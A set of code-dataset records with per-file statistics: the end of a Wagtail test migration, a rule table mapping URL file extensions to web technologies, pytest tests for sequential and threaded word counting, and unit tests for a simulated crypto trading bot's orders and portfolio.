            name='TestHomePage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        # Plain translatable model (translation_key + locale unique pair).
        migrations.CreateModel(
            name='TestModel',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('translation_key', models.UUIDField(default=uuid.uuid4, editable=False)),
                ('title', models.CharField(max_length=255)),
                ('test_charfield', models.CharField(blank=True, max_length=255)),
                ('test_textfield', models.TextField(blank=True)),
                ('test_emailfield', models.EmailField(blank=True, max_length=254)),
                ('locale', models.ForeignKey(editable=False, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='wagtailcore.Locale')),
            ],
            options={
                'abstract': False,
                'unique_together': {('translation_key', 'locale')},
            },
        ),
        # Page exercising one field of every translatable/synchronized kind.
        migrations.CreateModel(
            name='TestPage',
            fields=[
                ('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
                ('test_charfield', models.CharField(blank=True, max_length=255)),
                ('test_textfield', models.TextField(blank=True)),
                ('test_emailfield', models.EmailField(blank=True, max_length=254)),
                ('test_slugfield', models.SlugField(blank=True)),
                ('test_urlfield', models.URLField(blank=True)),
                ('test_richtextfield', wagtail.core.fields.RichTextField(blank=True)),
                ('test_streamfield', wagtail.core.fields.StreamField([('test_charblock', wagtail.core.blocks.CharBlock(max_length=255)), ('test_textblock', wagtail.core.blocks.TextBlock()), ('test_emailblock', wagtail.core.blocks.EmailBlock()), ('test_urlblock', wagtail.core.blocks.URLBlock()), ('test_richtextblock', wagtail.core.blocks.RichTextBlock()), ('test_rawhtmlblock', wagtail.core.blocks.RawHTMLBlock()), ('test_blockquoteblock', wagtail.core.blocks.BlockQuoteBlock()), ('test_structblock', wagtail.core.blocks.StructBlock([('field_a', wagtail.core.blocks.TextBlock()), ('field_b', wagtail.core.blocks.TextBlock())])), ('test_listblock', wagtail.core.blocks.ListBlock(wagtail.core.blocks.TextBlock())), ('test_nestedstreamblock', wagtail.core.blocks.StreamBlock([('block_a', wagtail.core.blocks.TextBlock()), ('block_b', wagtail.core.blocks.TextBlock())])), ('test_customstructblock', wagtail.core.blocks.StructBlock([('field_a', wagtail.core.blocks.TextBlock()), ('field_b', wagtail.core.blocks.TextBlock())]))], blank=True)),
                ('test_customfield', wagtail_localize.test.models.TestCustomField(blank=True)),
                ('test_synchronized_charfield', models.CharField(blank=True, max_length=255)),
                ('test_synchronized_textfield', models.TextField(blank=True)),
                ('test_synchronized_emailfield', models.EmailField(blank=True, max_length=254)),
                ('test_synchronized_slugfield', models.SlugField(blank=True)),
                ('test_synchronized_urlfield', models.URLField(blank=True)),
                ('test_synchronized_richtextfield', wagtail.core.fields.RichTextField(blank=True)),
                ('test_synchronized_streamfield', wagtail.core.fields.StreamField([('test_charblock', wagtail.core.blocks.CharBlock(max_length=255)), ('test_textblock', wagtail.core.blocks.TextBlock()), ('test_emailblock', wagtail.core.blocks.EmailBlock()), ('test_urlblock', wagtail.core.blocks.URLBlock()), ('test_richtextblock', wagtail.core.blocks.RichTextBlock()), ('test_rawhtmlblock', wagtail.core.blocks.RawHTMLBlock()), ('test_blockquoteblock', wagtail.core.blocks.BlockQuoteBlock()), ('test_structblock', wagtail.core.blocks.StructBlock([('field_a', wagtail.core.blocks.TextBlock()), ('field_b', wagtail.core.blocks.TextBlock())])), ('test_listblock', wagtail.core.blocks.ListBlock(wagtail.core.blocks.TextBlock())), ('test_nestedstreamblock', wagtail.core.blocks.StreamBlock([('block_a', wagtail.core.blocks.TextBlock()), ('block_b', wagtail.core.blocks.TextBlock())])), ('test_customstructblock', wagtail.core.blocks.StructBlock([('field_a', wagtail.core.blocks.TextBlock()), ('field_b', wagtail.core.blocks.TextBlock())]))], blank=True)),
                ('test_synchronized_customfield', wagtail_localize.test.models.TestCustomField(blank=True)),
            ],
            options={
                'abstract': False,
            },
            bases=('wagtailcore.page',),
        ),
        # Multi-table-inheritance child of TestModel.
        migrations.CreateModel(
            name='InheritedTestModel',
            fields=[
                ('testmodel_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtail_localize_test.TestModel')),
            ],
            bases=('wagtail_localize_test.testmodel',),
        ),
        # Orderable child object kept in sync (not translated) with its page.
        migrations.CreateModel(
            name='TestSynchronizedChildObject',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('field', models.TextField()),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='test_synchronized_childobjects', to='wagtail_localize_test.TestPage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        # Translatable snippet.
        migrations.CreateModel(
            name='TestSnippet',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('translation_key', models.UUIDField(default=uuid.uuid4, editable=False)),
                ('field', models.TextField()),
                ('locale', models.ForeignKey(editable=False, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='wagtailcore.Locale')),
            ],
            options={
                'abstract': False,
                'unique_together': {('translation_key', 'locale')},
            },
        ),
        # FK fields added after TestSnippet exists to avoid ordering issues.
        migrations.AddField(
            model_name='testpage',
            name='test_snippet',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='wagtail_localize_test.TestSnippet'),
        ),
        migrations.AddField(
            model_name='testpage',
            name='test_synchronized_snippet',
            field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtail_localize_test.TestSnippet'),
        ),
        # Child object with a plain FK (not a ParentalKey) to the page.
        migrations.CreateModel(
            name='TestNonParentalChildObject',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('translation_key', models.UUIDField(default=uuid.uuid4, editable=False)),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('field', models.TextField()),
                ('locale', models.ForeignKey(editable=False, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='wagtailcore.Locale')),
                ('page', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='test_nonparentalchildobjects', to='wagtail_localize_test.TestPage')),
            ],
            options={
                'abstract': False,
                'unique_together': {('translation_key', 'locale')},
            },
        ),
        # Translatable, orderable child object attached via ParentalKey.
        migrations.CreateModel(
            name='TestChildObject',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('translation_key', models.UUIDField(default=uuid.uuid4, editable=False)),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('field', models.TextField()),
                ('locale', models.ForeignKey(editable=False, on_delete=django.db.models.deletion.PROTECT, related_name='+', to='wagtailcore.Locale')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='test_childobjects', to='wagtail_localize_test.TestPage')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
                'unique_together': {('translation_key', 'locale')},
            },
        ),
    ]
| 64.844595
| 1,051
| 0.634469
| 943
| 9,597
| 6.281018
| 0.126193
| 0.078001
| 0.106196
| 0.070235
| 0.863414
| 0.863414
| 0.815465
| 0.796893
| 0.757724
| 0.718217
| 0
| 0.006637
| 0.215067
| 9,597
| 147
| 1,052
| 65.285714
| 0.779636
| 0.004689
| 0
| 0.628571
| 1
| 0
| 0.202304
| 0.072984
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.05
| 0
| 0.078571
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cb59bb63d7c6bcbc99189e814c1f5117d475e38d
| 2,882
|
py
|
Python
|
lookatweb/rules/ext.py
|
ivbeg/lookatweb
|
b98e3ebd29c00e2f718c3392bb31b7202aa82a99
|
[
"BSD-3-Clause"
] | 2
|
2018-01-18T13:22:29.000Z
|
2018-02-03T13:10:20.000Z
|
lookatweb/rules/ext.py
|
ivbeg/lookatweb
|
b98e3ebd29c00e2f718c3392bb31b7202aa82a99
|
[
"BSD-3-Clause"
] | null | null | null |
lookatweb/rules/ext.py
|
ivbeg/lookatweb
|
b98e3ebd29c00e2f718c3392bb31b7202aa82a99
|
[
"BSD-3-Clause"
] | null | null | null |
from .consts import *
# File extensions complex rules.
# Each rule matches a URL file extension (RULETYPE_EQUAL, exact match) and
# maps it to the web-technology entities that the extension reveals.
#
# Fixes versus the previous revision:
#  - 'do' pointed at the malformed entity name 'web:tech:/jsp'; it now uses
#    'web:tech/jsp', consistent with the 'jsp' rule below.
#  - Four byte-identical duplicates of the 'php' rule were removed; they only
#    produced duplicate entity hits for the same extension.
EXT_COMPLEX_RULES = [
    {'type': RULETYPE_EQUAL, 'text': 'php',
     'entities': [
         {'name': 'web:tech:lang/php'},
     ]
     },
    {'type': RULETYPE_EQUAL, 'text': 'py',
     'entities': [
         {'name': 'web:tech:lang/python'},
     ]
     },
    {'type': RULETYPE_EQUAL, 'text': 'phtml',
     'entities': [
         {'name': 'web:tech:lang/php'},
     ]
     },
    {'type': RULETYPE_EQUAL, 'text': 'php3',
     'entities': [
         {'name': 'web:tech:lang/php'},
     ]
     },
    {'type': RULETYPE_EQUAL, 'text': 'php4',
     'entities': [
         {'name': 'web:tech:lang/php'},
     ]
     },
    {'type': RULETYPE_EQUAL, 'text': 'php5',
     'entities': [
         {'name': 'web:tech:lang/php'},
     ]
     },
    {'type': RULETYPE_EQUAL, 'text': 'do',
     'entities': [
         {'name': 'web:tech/jsp'},
     ]
     },
    {'type': RULETYPE_EQUAL, 'text': 'jsp',
     'entities': [
         {'name': 'web:tech/jsp'},
     ]
     },
    {'type': RULETYPE_EQUAL, 'text': 'asp',
     'entities': [
         {'name': 'web:tech:lang/asp'},
         {'name': 'web:os/windows'},
     ]
     },
    {'type': RULETYPE_EQUAL, 'text': 'aspx',
     'entities': [
         {'name': 'web:tech:lang/aspnet'},
     ]
     },
    {'type': RULETYPE_EQUAL, 'text': 'cfm',
     'entities': [
         {'name': 'web:tech:lang/coldfusion'},
     ]
     },
    {'type': RULETYPE_EQUAL, 'text': 'cfml',
     'entities': [
         {'name': 'web:tech:lang/coldfusion'},
     ]
     },
    {'type': RULETYPE_EQUAL, 'text': 'cfmx',
     'entities': [
         {'name': 'web:tech:lang/coldfusion'},
     ]
     },
    {'type': RULETYPE_EQUAL, 'text': 'cfc',
     'entities': [
         {'name': 'web:tech:lang/coldfusion'},
     ]
     },
    {'type': RULETYPE_EQUAL, 'text': 'cgi',
     'entities': [
         {'name': 'web:tech/cgi'},
     ]
     },
    {'type': RULETYPE_EQUAL, 'text': 'axd',
     'entities': [
         {'name': 'web:tech:lang/aspnet'},
     ]
     },
    {'type': RULETYPE_EQUAL, 'text': 'nsf',
     'entities': [
         {'name': 'web:tech/lotusdomino'},
     ]
     },
]
| 25.732143
| 50
| 0.409785
| 241
| 2,882
| 4.804979
| 0.165975
| 0.132988
| 0.30829
| 0.380829
| 0.783247
| 0.743523
| 0.743523
| 0.743523
| 0.743523
| 0.669257
| 0
| 0.001664
| 0.374393
| 2,882
| 111
| 51
| 25.963964
| 0.640599
| 0.010062
| 0
| 0.376147
| 0
| 0
| 0.312171
| 0.033672
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009174
| 0
| 0.009174
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb9eb7fe70e64c8408cf69bf7cd437f1e412ea17
| 2,197
|
py
|
Python
|
exercise_3/test_solution.py
|
jeff-a-holland/python_class_2021_B2
|
e1dd93d50f332734954091c26c9a5ea7eb5251e7
|
[
"MIT"
] | null | null | null |
exercise_3/test_solution.py
|
jeff-a-holland/python_class_2021_B2
|
e1dd93d50f332734954091c26c9a5ea7eb5251e7
|
[
"MIT"
] | null | null | null |
exercise_3/test_solution.py
|
jeff-a-holland/python_class_2021_B2
|
e1dd93d50f332734954091c26c9a5ea7eb5251e7
|
[
"MIT"
] | null | null | null |
#!/Users/jeff/.pyenv/shims/python
from solution import count_words_sequential, count_words_threading
def test_non_threaded_empty_dir(tmp_path):
    """An empty directory holds zero words (sequential counter)."""
    target = tmp_path / 'testfiles'
    target.mkdir()
    assert count_words_sequential(str(target / '*.txt')) == 0
def test_non_threaded_dirname(tmp_path):
    """A glob that matches only a subdirectory yields zero words (sequential)."""
    target = tmp_path / 'testfiles'
    target.mkdir()
    (target / 'subdir').mkdir()
    assert count_words_sequential(str(target / '*d*')) == 0
def test_non_threaded_one_empty_file(tmp_path):
    """A single zero-byte file contributes no words (sequential)."""
    target = tmp_path / 'testfiles'
    target.mkdir()
    (target / 'mytestfile.txt').write_text('')
    assert count_words_sequential(str(target / '*.txt')) == 0
def test_non_threaded_five(tmp_path):
    """Three files of five words each total 15 words (sequential).

    Bug fix: the loop previously wrote every iteration to one fixed
    filename (the loop variable was unused), so only a single 5-word file
    existed while 15 words were asserted. Each name now gets its own file.
    """
    test_directory = tmp_path / 'testfiles'
    test_directory.mkdir()
    s = 'abc def ghi jkl mno'
    for filename in ['abc', 'def', 'ghi']:
        (test_directory / f'{filename}.txt').write_text(s)
    assert 15 == count_words_sequential(str(test_directory / '*.txt'))
def test_threaded_empty_dir(tmp_path):
    """An empty directory holds zero words (threaded counter)."""
    target = tmp_path / 'testfiles'
    target.mkdir()
    assert count_words_threading(str(target / '*.txt')) == 0
def test_threaded_dirname(tmp_path):
    """A glob that matches only a subdirectory yields zero words (threaded)."""
    target = tmp_path / 'testfiles'
    target.mkdir()
    (target / 'subdir').mkdir()
    assert count_words_threading(str(target / '*d*')) == 0
def test_threaded_one_empty_file(tmp_path):
    """A single zero-byte file contributes no words (threaded)."""
    target = tmp_path / 'testfiles'
    target.mkdir()
    (target / 'mytestfile.txt').write_text('')
    assert count_words_threading(str(target / '*.txt')) == 0
def test_threaded_five(tmp_path):
    """Three files of five words each total 15 words (threaded).

    Bug fix: the loop previously wrote every iteration to one fixed
    filename (the loop variable was unused), so only a single 5-word file
    existed while 15 words were asserted. Each name now gets its own file.
    """
    test_directory = tmp_path / 'testfiles'
    test_directory.mkdir()
    s = 'abc def ghi jkl mno'
    for filename in ['abc', 'def', 'ghi']:
        (test_directory / f'{filename}.txt').write_text(s)
    assert 15 == count_words_threading(str(test_directory / '*.txt'))
| 27.123457
| 70
| 0.686391
| 298
| 2,197
| 4.738255
| 0.16443
| 0.276204
| 0.062323
| 0.113314
| 0.93272
| 0.93272
| 0.921388
| 0.901558
| 0.901558
| 0.839943
| 0
| 0.005596
| 0.186618
| 2,197
| 80
| 71
| 27.4625
| 0.784555
| 0.014565
| 0
| 0.734694
| 0
| 0
| 0.109057
| 0
| 0
| 0
| 0
| 0
| 0.163265
| 1
| 0.163265
| false
| 0
| 0.020408
| 0
| 0.183673
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cbc0b0595e9c2d3523d50e6c51b7eace108b4d12
| 14,240
|
py
|
Python
|
tests/unit_tests/trading_tests/test_trader.py
|
CryptoRichy/OctoBot
|
1ca5bd2ba4b8fc09859518fcb2a62f74a1435019
|
[
"Apache-2.0"
] | 1
|
2018-11-26T16:43:36.000Z
|
2018-11-26T16:43:36.000Z
|
tests/unit_tests/trading_tests/test_trader.py
|
CryptoRichy/OctoBot
|
1ca5bd2ba4b8fc09859518fcb2a62f74a1435019
|
[
"Apache-2.0"
] | null | null | null |
tests/unit_tests/trading_tests/test_trader.py
|
CryptoRichy/OctoBot
|
1ca5bd2ba4b8fc09859518fcb2a62f74a1435019
|
[
"Apache-2.0"
] | null | null | null |
import ccxt
import copy
from trading.exchanges.exchange_manager import ExchangeManager
from config.cst import *
from tests.test_utils.config import load_test_config
from trading.trader.order import *
from trading.trader.order_notifier import OrderNotifier
from trading.trader.trader import Trader
from trading.trader.trader_simulator import TraderSimulator
from trading.trader.portfolio import Portfolio
class TestTrader:
DEFAULT_SYMBOL = "BTC/USDT"
@staticmethod
def init_default():
    """Build the standard fixture: config, simulated binance exchange, trader."""
    config = load_test_config()
    manager = ExchangeManager(config, ccxt.binance, is_simulated=True)
    exchange = manager.get_exchange()
    trader = TraderSimulator(config, exchange, 2)
    return config, exchange, trader
@staticmethod
def stop(trader):
    """Shut down the given trader's order manager (fixture teardown)."""
    trader.stop_order_manager()
def test_enabled(self):
    """Trader.enabled mirrors the CONFIG_ENABLED_OPTION flag in the config."""
    config, _, trader = self.init_default()
    self.stop(trader)
    # Enabled flag set -> trader reported as enabled.
    config[CONFIG_TRADER][CONFIG_ENABLED_OPTION] = True
    assert Trader.enabled(config)
    # Enabled flag cleared -> trader reported as disabled.
    config[CONFIG_TRADER][CONFIG_ENABLED_OPTION] = False
    assert not Trader.enabled(config)
def test_get_risk(self):
    """Configured risk is clamped into [CONFIG_TRADER_RISK_MIN, CONFIG_TRADER_RISK_MAX]."""
    config, exchange_inst, trader_inst = self.init_default()
    self.stop(trader_inst)
    # (configured value, expected clamped result)
    cases = (
        (0, CONFIG_TRADER_RISK_MIN),    # below range -> clamped up
        (2, CONFIG_TRADER_RISK_MAX),    # above range -> clamped down
        (0.5, 0.5),                     # in range -> unchanged
    )
    for configured, expected in cases:
        config[CONFIG_TRADER][CONFIG_TRADER_RISK] = configured
        trader = Trader(config, exchange_inst)
        assert trader.get_risk() == expected
        self.stop(trader)
def test_cancel_order(self):
    """Cancelling an open order removes it from the order manager's list."""
    _, _, trader_inst = self.init_default()
    # Test buy order
    market_buy = BuyMarketOrder(trader_inst)
    # args: order type class, symbol, current price, quantity, price
    # — TODO confirm against Order.new's signature.
    market_buy.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.BUY_MARKET],
                   self.DEFAULT_SYMBOL,
                   70,
                   10,
                   70)
    # Not registered yet, so it must not appear among open orders.
    assert market_buy not in trader_inst.get_open_orders()
    trader_inst.get_order_manager().add_order_to_list(market_buy)
    assert market_buy in trader_inst.get_open_orders()
    trader_inst.cancel_order(market_buy)
    assert market_buy not in trader_inst.get_open_orders()
    self.stop(trader_inst)
def test_cancel_open_orders_default_symbol(self):
    """cancel_open_orders(symbol) removes every open order for that symbol."""
    config, _, trader_inst = self.init_default()
    # Test buy order
    market_buy = BuyMarketOrder(trader_inst)
    market_buy.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.BUY_MARKET],
                   self.DEFAULT_SYMBOL,
                   70,
                   10,
                   70)
    # Test sell order
    market_sell = SellMarketOrder(trader_inst)
    market_sell.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.SELL_MARKET],
                    self.DEFAULT_SYMBOL,
                    70,
                    10,
                    70)
    # Test buy order
    limit_buy = BuyLimitOrder(trader_inst)
    limit_buy.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.BUY_LIMIT],
                  self.DEFAULT_SYMBOL,
                  70,
                  10,
                  70)
    # create order notifier to prevent None call
    market_buy.order_notifier = OrderNotifier(config, market_buy)
    market_sell.order_notifier = OrderNotifier(config, market_sell)
    limit_buy.order_notifier = OrderNotifier(config, limit_buy)
    # Register all three orders, then verify they are listed as open.
    trader_inst.get_order_manager().add_order_to_list(market_buy)
    trader_inst.get_order_manager().add_order_to_list(market_sell)
    trader_inst.get_order_manager().add_order_to_list(limit_buy)
    assert market_buy in trader_inst.get_open_orders()
    assert market_sell in trader_inst.get_open_orders()
    assert limit_buy in trader_inst.get_open_orders()
    # All orders share DEFAULT_SYMBOL, so one call cancels them all.
    trader_inst.cancel_open_orders(self.DEFAULT_SYMBOL)
    assert market_buy not in trader_inst.get_open_orders()
    assert market_sell not in trader_inst.get_open_orders()
    assert limit_buy not in trader_inst.get_open_orders()
    self.stop(trader_inst)
def test_cancel_open_orders_multi_symbol(self):
    """cancel_open_orders(symbol) leaves orders on other symbols untouched."""
    config, _, trader_inst = self.init_default()
    # Test buy order (different symbol: must survive the cancel below)
    market_buy = BuyMarketOrder(trader_inst)
    market_buy.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.BUY_MARKET],
                   "BTC/EUR",
                   70,
                   10,
                   70)
    # Test buy order (different symbol: must survive the cancel below)
    limit_sell = SellLimitOrder(trader_inst)
    limit_sell.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.SELL_LIMIT],
                   "NANO/USDT",
                   70,
                   10,
                   70)
    # Test sell order (DEFAULT_SYMBOL: must be cancelled)
    market_sell = SellMarketOrder(trader_inst)
    market_sell.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.SELL_MARKET],
                    self.DEFAULT_SYMBOL,
                    70,
                    10,
                    70)
    # Test buy order (DEFAULT_SYMBOL: must be cancelled)
    limit_buy = BuyLimitOrder(trader_inst)
    limit_buy.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.BUY_LIMIT],
                  self.DEFAULT_SYMBOL,
                  70,
                  10,
                  70)
    # create order notifier to prevent None call
    market_buy.order_notifier = OrderNotifier(config, market_buy)
    market_sell.order_notifier = OrderNotifier(config, market_sell)
    limit_buy.order_notifier = OrderNotifier(config, limit_buy)
    limit_sell.order_notifier = OrderNotifier(config, limit_sell)
    trader_inst.get_order_manager().add_order_to_list(market_buy)
    trader_inst.get_order_manager().add_order_to_list(market_sell)
    trader_inst.get_order_manager().add_order_to_list(limit_buy)
    trader_inst.get_order_manager().add_order_to_list(limit_sell)
    assert market_buy in trader_inst.get_open_orders()
    assert market_sell in trader_inst.get_open_orders()
    assert limit_buy in trader_inst.get_open_orders()
    assert limit_sell in trader_inst.get_open_orders()
    # Cancel only DEFAULT_SYMBOL orders; other symbols stay open.
    trader_inst.cancel_open_orders(self.DEFAULT_SYMBOL)
    assert market_buy in trader_inst.get_open_orders()
    assert market_sell not in trader_inst.get_open_orders()
    assert limit_buy not in trader_inst.get_open_orders()
    assert limit_sell in trader_inst.get_open_orders()
    self.stop(trader_inst)
def test_notify_order_close(self):
    """notify_order_close removes exactly the notified orders from the open list."""
    config, _, trader_inst = self.init_default()
    # Market buy order: will be closed below
    market_buy = BuyMarketOrder(trader_inst)
    market_buy.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.BUY_MARKET],
                   "BTC/EUR",
                   70,
                   10,
                   70)
    # Limit sell order: will be closed below
    limit_sell = SellLimitOrder(trader_inst)
    limit_sell.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.SELL_LIMIT],
                   "NANO/USDT",
                   70,
                   10,
                   70)
    # Stop loss order: never notified, must remain open
    stop_loss = StopLossOrder(trader_inst)
    stop_loss.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.STOP_LOSS],
                  "BTC/USD",
                  60,
                  10,
                  60)
    # create order notifier to prevent None call
    market_buy.order_notifier = OrderNotifier(config, market_buy)
    limit_sell.order_notifier = OrderNotifier(config, limit_sell)
    stop_loss.order_notifier = OrderNotifier(config, stop_loss)
    trader_inst.get_order_manager().add_order_to_list(market_buy)
    trader_inst.get_order_manager().add_order_to_list(stop_loss)
    trader_inst.get_order_manager().add_order_to_list(limit_sell)
    # Close two of the three orders (second argument True = cancelled)
    trader_inst.notify_order_close(limit_sell, True)
    trader_inst.notify_order_close(market_buy, True)
    assert market_buy not in trader_inst.get_open_orders()
    assert limit_sell not in trader_inst.get_open_orders()
    assert stop_loss in trader_inst.get_open_orders()
    self.stop(trader_inst)
def test_notify_sell_limit_order_cancel(self):
    """Cancelling the only open limit order restores the initial portfolio."""
    config, _, trader = self.init_default()
    portfolio_before = copy.deepcopy(trader.portfolio.portfolio)

    # Open a single limit buy order
    buy_order = trader.create_order_instance(order_type=TraderOrderType.BUY_LIMIT,
                                             symbol="BQX/BTC",
                                             current_price=4,
                                             quantity=2,
                                             price=4)
    trader.create_order(buy_order, trader.portfolio)

    # Cancel it: the order disappears and the reserved funds are released
    trader.notify_order_close(buy_order, True)
    assert buy_order not in trader.get_open_orders()
    assert trader.portfolio.portfolio == portfolio_before

    self.stop(trader)
def test_notify_sell_limit_order_cancel_one_in_two(self):
    """Cancelling one of two open orders releases only that order's funds."""
    config, _, trader = self.init_default()
    portfolio_before = copy.deepcopy(trader.portfolio.portfolio)

    # First limit buy order
    first_buy = trader.create_order_instance(order_type=TraderOrderType.BUY_LIMIT,
                                             symbol="BQX/BTC",
                                             current_price=4,
                                             quantity=2,
                                             price=4)
    trader.create_order(first_buy, trader.portfolio)

    # Second limit buy order on another symbol
    second_buy = trader.create_order_instance(order_type=TraderOrderType.BUY_LIMIT,
                                              symbol="VEN/BTC",
                                              current_price=1,
                                              quantity=1.5,
                                              price=1)
    trader.create_order(second_buy, trader.portfolio)

    # Cancel only the first order
    trader.notify_order_close(first_buy, True)
    assert first_buy not in trader.get_open_orders()
    assert second_buy in trader.get_open_orders()

    # The second order still locks funds: 10 - 1.5 * 1 = 8.5 BTC available
    assert trader.portfolio.portfolio != portfolio_before
    assert trader.portfolio.portfolio["BTC"][Portfolio.AVAILABLE] == 8.5
    assert trader.portfolio.portfolio["BTC"][Portfolio.TOTAL] == 10

    self.stop(trader)
def test_notify_sell_limit_order_fill(self):
    """A fully filled limit buy converts the quote funds into the bought asset."""
    config, _, trader = self.init_default()
    portfolio_before = copy.deepcopy(trader.portfolio.portfolio)

    # Open a limit buy order: 10 BQX at 0.1 BTC each
    buy_order = trader.create_order_instance(order_type=TraderOrderType.BUY_LIMIT,
                                             symbol="BQX/BTC",
                                             current_price=0.1,
                                             quantity=10,
                                             price=0.1)
    trader.create_order(buy_order, trader.portfolio)

    # Simulate a complete fill at the requested price and quantity
    buy_order.filled_price = buy_order.origin_price
    buy_order.filled_quantity = buy_order.origin_quantity
    trader.notify_order_close(buy_order)

    assert buy_order not in trader.get_open_orders()
    assert trader.portfolio.portfolio != portfolio_before
    # 10 * 0.1 = 1 BTC spent, 10 BQX received
    assert trader.portfolio.portfolio["BTC"][Portfolio.AVAILABLE] == 9
    assert trader.portfolio.portfolio["BTC"][Portfolio.TOTAL] == 9
    assert trader.portfolio.portfolio["BQX"][Portfolio.AVAILABLE] == 10
    assert trader.portfolio.portfolio["BQX"][Portfolio.TOTAL] == 10

    self.stop(trader)
def test_notify_order_close_with_linked_orders(self):
    """Closing an order also removes the orders linked to it.

    limit_sell and stop_loss are linked to each other; closing limit_sell
    must take stop_loss off the open list too, while the unrelated
    market_buy stays open.
    """
    config, _, trader_inst = self.init_default()
    # Unrelated market buy order: must remain open
    market_buy = BuyMarketOrder(trader_inst)
    market_buy.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.BUY_MARKET],
                   "BTC/EUR",
                   70,
                   10,
                   70)
    # Limit sell order, linked with the stop loss below
    limit_sell = SellLimitOrder(trader_inst)
    limit_sell.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.SELL_LIMIT],
                   "NANO/USDT",
                   70,
                   10,
                   70)
    # Stop loss order, linked with the limit sell above
    stop_loss = StopLossOrder(trader_inst)
    stop_loss.new(OrderConstants.TraderOrderTypeClasses[TraderOrderType.STOP_LOSS],
                  "BTC/USD",
                  60,
                  10,
                  60)
    # Link the two orders both ways
    stop_loss.add_linked_order(limit_sell)
    limit_sell.add_linked_order(stop_loss)
    # create order notifier to prevent None call
    market_buy.order_notifier = OrderNotifier(config, market_buy)
    stop_loss.order_notifier = OrderNotifier(config, stop_loss)
    limit_sell.order_notifier = OrderNotifier(config, limit_sell)
    trader_inst.get_order_manager().add_order_to_list(market_buy)
    trader_inst.get_order_manager().add_order_to_list(stop_loss)
    trader_inst.get_order_manager().add_order_to_list(limit_sell)
    trader_inst.notify_order_close(limit_sell)
    # Closing limit_sell removed its linked stop_loss as well
    assert market_buy in trader_inst.get_open_orders()
    assert stop_loss not in trader_inst.get_open_orders()
    assert limit_sell not in trader_inst.get_open_orders()
    self.stop(trader_inst)
| 39.22865
| 98
| 0.619382
| 1,568
| 14,240
| 5.265944
| 0.070153
| 0.13322
| 0.064551
| 0.049049
| 0.865811
| 0.848008
| 0.828388
| 0.807436
| 0.786121
| 0.768197
| 0
| 0.012992
| 0.313553
| 14,240
| 362
| 99
| 39.337017
| 0.831714
| 0.033848
| 0
| 0.717647
| 0
| 0
| 0.008446
| 0
| 0
| 0
| 0
| 0
| 0.160784
| 1
| 0.047059
| false
| 0
| 0.039216
| 0
| 0.098039
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
